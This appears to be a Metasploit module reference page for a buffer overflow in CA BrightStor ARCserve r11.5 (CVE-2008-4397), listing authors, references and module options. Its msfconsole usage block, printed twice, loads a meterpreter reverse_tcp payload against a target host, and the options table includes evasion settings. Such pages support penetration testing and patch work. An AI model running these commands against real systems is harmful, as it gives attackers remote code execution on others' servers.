Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
This module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need set the hostname argument (HNAME).
Exploit Rank
- Average
Exploit Authors
- Nahuel Cayento Riva < >
- MC < mc [at] metasploit.com >
Vulnerability References
- BID-31684
- OSVDB-49468
- CVE-2008-4397
- http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associat...
Exploit Targets
- 0 - Computer Associates BrighStor ARCserve r11.5 (build 3884) (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/brightstor/discovery_tcp
- exploit/windows/brightstor/discovery_udp
- exploit/windows/brightstor/etrust_itm_alert
- exploit/windows/brightstor/hsmserver
- exploit/windows/brightstor/lgserver
- exploit/windows/brightstor/lgserver_multi
- exploit/windows/brightstor/lgserver_rxrlogin
- exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter
- exploit/windows/brightstor/lgserver_rxsuselicenseini
- exploit/windows/brightstor/license_gcr
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/brightstor/ca_arcserve_342
msf exploit(ca_arcserve_342) > show payloads
msf exploit(ca_arcserve_342) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ca_arcserve_342) > set LHOST [MY IP ADDRESS]
msf exploit(ca_arcserve_342) > set HNAME [STRING]
msf exploit(ca_arcserve_342) > set RHOST [TARGET IP]
msf exploit(ca_arcserve_342) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/brightstor/ca_arcserve_342
msf exploit(ca_arcserve_342) > show payloads
msf exploit(ca_arcserve_342) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ca_arcserve_342) > set LHOST [MY IP ADDRESS]
msf exploit(ca_arcserve_342) > set HNAME [STRING]
msf exploit(ca_arcserve_342) > set RHOST [TARGET IP]
msf exploit(ca_arcserve_342) > exploit
Exploit Module Options
| HNAME | The NetBios hostname of the target. |
| RHOST | The target address |
| RPORT | The target port (default: 6504) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DCERPC::ReadTimeout | The number of seconds to wait for DCERPC responses |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| Proxies | Use a proxy chain |
| SMB::ChunkSize | The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing |
| SMB::Native_LM | The Native LM to send during authentication |
| SMB::Native_OS | The Native OS to send during authentication |
| SMB::VerifySignature | Enforces client-side verification of server response signatures |
| SMBDirect | The target port is a raw SMB service (not NetBIOS) |
| SMBDomain | The Windows domain to use for authentication |
| SMBName | The NetBIOS hostname (required for port 139 connections) |
| SMBPass | The password for the specified username |
| SMBUser | The username to authenticate as |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| DCERPC::fake_bind_multi | Use multi-context bind calls |
| DCERPC::fake_bind_multi_append | Set the number of UUIDs to append the target |
| DCERPC::fake_bind_multi_prepend | Set the number of UUIDs to prepend before the target |
| DCERPC::max_frag_size | Set the DCERPC packet fragmentation size |
| DCERPC::smb_pipeio | Use a different delivery method for accessing named pipes (accepted: rw, trans) |
| SMB::obscure_trans_pipe_level | Obscure PIPE string in TransNamedPipe (level 0-3) |
| SMB::pad_data_level | Place extra padding between headers and data (level 0-3) |
| SMB::pad_file_level | Obscure path names used in open/create (level 0-3) |
| SMB::pipe_evasion | Enable segmented read/writes for SMB Pipes |
| SMB::pipe_read_max_size | Maximum buffer size for pipe reads |
| SMB::pipe_read_min_size | Minimum buffer size for pipe reads |
| SMB::pipe_write_max_size | Maximum buffer size for pipe writes |
| SMB::pipe_write_min_size | Minimum buffer size for pipe writes |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |